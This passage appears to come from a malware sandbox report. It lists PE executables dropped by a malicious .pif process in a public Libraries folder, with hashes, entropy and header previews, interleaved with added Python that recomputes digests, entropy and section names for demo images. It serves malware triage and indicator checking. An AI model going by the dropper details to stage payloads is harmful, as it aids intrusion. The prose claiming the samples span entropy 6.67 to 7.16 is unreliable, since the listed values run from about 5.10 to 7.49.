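    header = dos + b"This program cannot be run in DOS mode.\r\n$"
    header += b"\x00" * (0x80 - len(header))
    coff = (b"PE\x00\x00" + (0x14C).to_bytes(2, "little")   # Machine: i386
            + (2).to_bytes(2, "little")                     # NumberOfSections
            + b"\x00" * 12                                  # timestamp, symtab ptr/count
            + (0xE0).to_bytes(2, "little")                  # SizeOfOptionalHeader (PE32)
            + (0x0102).to_bytes(2, "little"))               # Characteristics
    optional = b"\x0b\x01" + b"\x00" * (0xE0 - 2)           # PE32 magic, rest zeroed
    sections = b"".join(n.ljust(8, b"\x00") + b"\x00" * 32 for n in (b".text", b".rdata"))
    body = bytes(range(256)) * 4                            # high-entropy payload stand-in
    return bytes(header + coff + optional + sections + body)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for key, value in summarize(blob).items():
        print(f"{key}: {value}")
```

Run it with a path to the dropped file to compare against the record; with no argument it summarizes the constructed sample. Hash and size mismatches against the report mean you are not looking at the same artifact (DBatLoader-style droppers commonly rewrite the payload per run), and an entropy drop after unpacking is the usual confirmation that the outer layer was the packer.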
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4971008
                                                                                                                                                                                                                        Entropy (8bit):6.670828897455733
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:mErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MG:4A4oGlcR+glEdOPKzgVZJD527BWG
                                                                                                                                                                                                                        MD5:8E60DF36F025752E3837B68006F6EE03
                                                                                                                                                                                                                        SHA1:8175D381E64FA49C58D1311CE46EB5B6F9984D47
                                                                                                                                                                                                                        SHA-256:06A718003D8FB347E2CEC24E1E0EB25A8BB23E686741FE60E9C0664415677DB4
                                                                                                                                                                                                                        SHA-512:6EEBDC4DBE0E925F3E8422E0380657A8B6B5BD09E6B3BE0AC75F853B2673CE0E17710A4347B5404303B76A0B967B6446E94F3CB1145B012906C79A78A19145C8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                        Entropy (8bit):6.829761399189547
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:X8ErDqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgK8:sv2gM+qwXLg7pPgw/DSZ9CD527BWG
                                                                                                                                                                                                                        MD5:A0C0F490D9E9EF2967964E83191BD024
                                                                                                                                                                                                                        SHA1:BA8C489D24EB897A6112B411AD0AA7F49719001A
                                                                                                                                                                                                                        SHA-256:A2AED593E6BD6A2E7986BDC47FCF131797F2E03BD3C9FA228D0A6652DF972509
                                                                                                                                                                                                                        SHA-512:93D3A4038380C4B12C68C3D5C7583B579FF6F68AF137EB0BBA24320FB0E91E72D7AD4C5A23F54593FAB56C7593A4A8DA240B9F1BFE42527CD2F279487A0285B0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....DuK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                        Entropy (8bit):6.8297644721829
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:i8ErDqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgK8:/v2gM+qwXLg7pPgw/DSZ9CD527BWG
                                                                                                                                                                                                                        MD5:15EEAC18C48706C3F6E62028D9BC6838
                                                                                                                                                                                                                        SHA1:DB17DF051CF261EE32F6D63A881F960EC2A5B555
                                                                                                                                                                                                                        SHA-256:9B28F8546DA706BA487A2EDBA31683C46A0993952FA4FEF696230196A9961D75
                                                                                                                                                                                                                        SHA-512:16D0FA117C04DEE2248C941A52DEA350B9550B9C08CC86BBCB37B48FCE670FA72BE88E5132B94E787C5777A41BC2FAC6FB8678774F8519197010DA8F03719774
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2156544
                                                                                                                                                                                                                        Entropy (8bit):6.953576455536211
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:ntjqL8fH+8aUbp8D/8+xQWAcsqjnhMgeiCl7G0nehbGZpbD:tjKK+81FI/85iDmg27RnWGj
                                                                                                                                                                                                                        MD5:EE6C03C908B23E31DF257B97DCD60660
                                                                                                                                                                                                                        SHA1:5323738E4D161D6C05378C58D1A0131FF21875EF
                                                                                                                                                                                                                        SHA-256:6414FD7B2083F2D70BA9FC6CA405FCEF74430B623D828CACA9226CDB1F7838F3
                                                                                                                                                                                                                        SHA-512:BA8B8FD86639F7B8AA6B5CCC2C47B2DEA3E78BD67EB9A56CE8D5C8E97F587063794C3F41127A9B0040E44DAFC9BD094BC0644B7ECD1366D5BA4136CBBE379127
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P".....`.!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2370560
                                                                                                                                                                                                                        Entropy (8bit):7.032375579812476
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:sAMsOu3JfCIGnZuTodRFYKBrFxbWp4Dmg27RnWGj:sAMa38ZuTS7D527BWG
                                                                                                                                                                                                                        MD5:9C0AEE5B556B514D8FFE9DAF726DD2C7
                                                                                                                                                                                                                        SHA1:31367F0DD58887C57032307F324E71D8D472591C
                                                                                                                                                                                                                        SHA-256:C39C665284EFE46D4F33719A482AC207B7E9D9A5B9D80230EFBE70DED4DC1B43
                                                                                                                                                                                                                        SHA-512:DC42DBB1603400987398A303F1412475790BC1DF3D77B8CD9222E59BB8044EAA358B3C512204B70DEBA1620FAAA767511DC8A07A2881AD28C5E0C984F8B61C1D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.....Z.$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1984512
                                                                                                                                                                                                                        Entropy (8bit):7.104324901146362
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:XwbK7tnhD4aH6wD2Krx5NgOOagtE8FUsqjnhMgeiCl7G0nehbGZpbD:XSK7Fhslq2EPfOfEpDmg27RnWGj
                                                                                                                                                                                                                        MD5:7BDD695D51D5248ABAD94BCC5FDFD7C3
                                                                                                                                                                                                                        SHA1:80F3DCF77D4B87F1FC5D6D8FC87F33FBDC9E56AB
                                                                                                                                                                                                                        SHA-256:6743D58688653C0AE4E084E93B186EDBBD5E8290AFA1C4855906B0FD504BB588
                                                                                                                                                                                                                        SHA-512:2C7321C1567F677B5BD2170B8A085154B4D01A1E17069BAF01B7895A9B4A200F99AD7F0736EA2F5F8DFBF1B16B0D3702D360267B7FEA49F511BAB0635666CE92
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................o..... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1779712
                                                                                                                                                                                                                        Entropy (8bit):7.158054727593673
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:7KI7Twj5KDHxJ1FxyD+/wsG1TbbcUsqjnhMgeiCl7G0nehbGZpbD:7v7e0j31mD+/wDfbbDmg27RnWGj
                                                                                                                                                                                                                        MD5:72CF331A76CD25E0F135A6FAF35FB25F
                                                                                                                                                                                                                        SHA1:05EF0F9395E5D62BF55E29B9274824187F8B480E
                                                                                                                                                                                                                        SHA-256:FB0624494835538D7FD5F719FEF2D68BDDFE902C3AA0A8A837694E783961274B
                                                                                                                                                                                                                        SHA-512:C2382E020F549787F7EDA83CBD13DC909B4F99E093ECAA6355EA01AFEC8378FBBE7458C8E1111A2C499B621167533D13E8DB3D2EDECF7E2D0D0FD3559D573A1D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................
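The records above list, for every file dropped by C:\Users\Public\Libraries\ymafvvdS.pif, the four digests, an 8-bit entropy figure, and a header preview whose visible strings are the PE section names. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it recomputes those same fields for a file you hold, so a hash or entropy value quoted here can be corroborated, and it walks the MZ/PE headers to recover the section names the previews hint at. The PE image it builds is constructed for the demo (headers only, not a runnable program); the entropy threshold used for the Encrypted flag is an assumption, not the sandbox's documented cut-off.

```python
"""Recompute the dropped-file record fields: digests, 8-bit entropy, PE sections.
Added example; the demo PE bytes are constructed inline and labelled as such."""
import hashlib
import math
import struct
from collections import Counter

# Assumed cut-off for flagging a file as packed/encrypted by entropy alone.
# Joe Sandbox's exact threshold is not stated on the page; this is a guess.
ASSUMED_ENCRYPTED_THRESHOLD = 7.5


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy over byte values, in bits per byte (0.0 .. 8.0).
    This is the usual meaning of an 'Entropy (8bit)' figure: 0.0 for a run of
    one byte value, 8.0 when all 256 values are equally frequent."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hash_record(data: bytes) -> dict:
    """Upper-case hex digests in the four algorithms the report lists."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def pe_section_names(data: bytes) -> list:
    """Walk MZ header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table
    and return the 8-byte section names (.text, .rdata, .pdata, .rsrc, ...)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER starts here
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + size_opt              # first IMAGE_SECTION_HEADER
    names = []
    for i in range(n_sections):
        off = table + 40 * i
        if off + 8 > len(data):
            raise ValueError("section table runs past end of file")
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def describe_dropped_file(data: bytes) -> dict:
    """Produce the same keys the report's dropped-file records carry."""
    entropy = shannon_entropy_8bit(data)
    record = {
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy,
        "Encrypted": entropy >= ASSUMED_ENCRYPTED_THRESHOLD,  # assumed rule
        "Sections": pe_section_names(data),
    }
    record.update(hash_record(data))
    return record


def build_demo_pe(section_names=(".text", ".rdata"), size_opt=0xF0) -> bytes:
    """Constructed, header-only PE32+ shaped image for the demo. It has a DOS
    stub with e_lfanew, a PE signature, a COFF header and a section table;
    nothing else, so it is not executable."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=AMD64, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSyms,
    # SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, size_opt, 0x22)
    opt = bytes([0x0B, 0x02]) + bytes(size_opt - 2)   # PE32+ magic, then padding
    sections = b"".join(n.encode().ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + opt + sections


if __name__ == "__main__":
    for key, value in describe_dropped_file(build_demo_pe()).items():
        print(f"{key}:{value}")
```

To check a real dropped file against its record, read it in binary mode and pass the bytes to describe_dropped_file; a digest mismatch means you are not holding the same artifact the sandbox saw, and an entropy near 8.0 is the usual hint that the section data is packed or encrypted, which these samples (6.67 to 7.16) are not.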
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1378304
                                                                                                                                                                                                                        Entropy (8bit):5.377418837432717
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:0QUVPDHhSTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:PyhSTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:78A6612E4D07F32C9FEA6BA8D8061F25
                                                                                                                                                                                                                        SHA1:EDDE46029E48AF1C84C02EF123F8F80BD214DE43
                                                                                                                                                                                                                        SHA-256:BF176E1FCDC2A8C1915F79A7F302B9781266175B8BFACDA0CB34B538CE886E4E
                                                                                                                                                                                                                        SHA-512:F6F0F99CC5EACBBAFA7774E92C674CE4DA51223F56F84B0804160C0E4E0DE373C95A2031904F9D85D1CC257DCCB1FFF41900D52B695103268BA4A6FC3D5B0A88
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p.......@.... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1286656
                                                                                                                                                                                                                        Entropy (8bit):7.22209984446946
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:qsFfc1VyFn5UQn652bO4HMsqjnhMgeiCl7G0nehbGZpbD:qsFcIn5rJSDmg27RnWGj
                                                                                                                                                                                                                        MD5:0B59664A2C1E61586FE9DAAE6D4FDEAE
                                                                                                                                                                                                                        SHA1:079A9E945AFE0E1CAE1A160982744FE72F6821D7
                                                                                                                                                                                                                        SHA-256:15E7FBC759539CA7B1F44B4F0F4807DC07BBAD6914EF1D64B359875CF971AF46
                                                                                                                                                                                                                        SHA-512:E0F70C8AF3D4428AA81BFCDA1C5A02ACB53C61C00E272F1AF9E68FEAF3D7832469042D38144ECE179AF88D40F7A73BDA40C10C15D9848CC2887377C9DC29B58F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1246208
                                                                                                                                                                                                                        Entropy (8bit):7.49426392990658
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:Ot9o6p4xQbiKI69wpemIwpel9XsqjnhMgeiCl7G0nehbGZpbD:Ot9faQbtl2peapel1Dmg27RnWGj
                                                                                                                                                                                                                        MD5:EF735D7409066638675EAD964C8D29FA
                                                                                                                                                                                                                        SHA1:5D224E431D3DA4B3402FD0074819FFC258801188
                                                                                                                                                                                                                        SHA-256:4299591410BD2EE96B0D14C4131CAACA2AEBD138791EA41151FE8B24B47264BD
                                                                                                                                                                                                                        SHA-512:6A7D16E12F41E6F556BE5B6409FF97136E14648F8E763D87A4D840360AA7BA42F2523A1A7F9AF0E8719BDC477839B2EEA162DC1153C63A2C648FFAD52229622D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@....................................?..... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1356800
                                                                                                                                                                                                                        Entropy (8bit):5.347825226792433
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:5QVTZu0JksqjnhMgeiCl7G0nehbGZpbD:aVTZuFDmg27RnWGj
                                                                                                                                                                                                                        MD5:B43EC32DD8CD568FB3D85089F03263A6
                                                                                                                                                                                                                        SHA1:C2281DA021340FB0A49FFBC3EF65D38F2CF9EFEB
                                                                                                                                                                                                                        SHA-256:A571479AAB90AC7869236A0AB6F515231189564E66C286CFD03C78F94A8B99D2
                                                                                                                                                                                                                        SHA-512:A3B3202CF1F1D0585DF96C8A35B6343E6B32024AFE2D51CBE913ACD7038007148CB0C7E0CB1FCBCA67523208546B5810DD2B0B5C1E50BDD68D747FF7FD529DA6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......,.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1344000
                                                                                                                                                                                                                        Entropy (8bit):6.808351155277148
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:9C1vpgXcZHzOsqjnhMgeiCl7G0nehbGZpbD:9C1vpIcNiDmg27RnWGj
                                                                                                                                                                                                                        MD5:D2A2575FDC296E3DA8C9EC7AA924F631
                                                                                                                                                                                                                        SHA1:88DAC87B44D5A803D5C7D945092A792E953B7EB4
                                                                                                                                                                                                                        SHA-256:4C549441400A2A2BA70571F988E129FDAFBE020AE6571B61E1471867B8A40CAB
                                                                                                                                                                                                                        SHA-512:ADA89B4A8A35D294EFBEE3317BE114B1DCE21690BA6402D043F8C19E0CD6519458CA20CC973C0CE108ED8E732EAA1D463C5A0C08A5B4E7164EC0CD7069EC07B7
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1200128
                                                                                                                                                                                                                        Entropy (8bit):5.140016032789808
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:ZSwjCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbEH:ZvCsqjnhMgeiCl7G0nehbGZpbD5
                                                                                                                                                                                                                        MD5:43FF687714E777C54D975BC9F175FEF9
                                                                                                                                                                                                                        SHA1:4A3F24F38DCF8D7BCE3F333BA0F040464C14E3D9
                                                                                                                                                                                                                        SHA-256:065473E01751967E7FC5209FCBDD6C717DFE3C3A5276327F98E6CB1BEC5937C6
                                                                                                                                                                                                                        SHA-512:AA9D60EDBEB39D2FEFEF78F9EBF2ABBC6DD7FB7C31F32DD2A4679858EE7E03E21B2800ED7DFB06EAD3C1CE222CAA350EB2D74BB2C4814E47D409B75E17B454B0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@....................................2r.... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1408512
                                                                                                                                                                                                                        Entropy (8bit):5.441144919459244
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:jWKntIfGpUsqjnhMgeiCl7G0nehbGZpbD:i8IeaDmg27RnWGj
                                                                                                                                                                                                                        MD5:BBDC97A309A129DA4182999C14A90C75
                                                                                                                                                                                                                        SHA1:6EAD545768E73CF6642DCC1AD724CF8D1DC3A938
                                                                                                                                                                                                                        SHA-256:FDD52436B249350265F7E69E4FD7C417DA42229D09FE9A5F4B98835488F8DAE3
                                                                                                                                                                                                                        SHA-512:89760705937416F5F8D6F6F771643C9649F0C93FC748230B10C6896957E22A98F7A4FF580CEF235EBED0896AE32C07CCE99A257D18CE39DC7163524D43A1A98D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.......................................... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1185280
Entropy (8bit):5.1032885579945795
Encrypted:false
SSDEEP:12288:MIh2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:t2sqjnhMgeiCl7G0nehbGZpbD
MD5:AA76A44655063807CF957D067D5B5B0F
SHA1:1F02757DDE0C9947CEDDF1927D76DE5135D85F4D
SHA-256:6FAE25D6C4C7D3380D9445317ACB836C57C4F553E39827564460A8A3FAE74707
SHA-512:7B5C017DF81B834CF0A9A99B4C0CD391A177A37290103C123B6840A4702CA4786F34571563E537EB5FDE3EF2461EC6C36C467A8692900B297E8224964931AC88
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1531904
Entropy (8bit):5.421190982297953
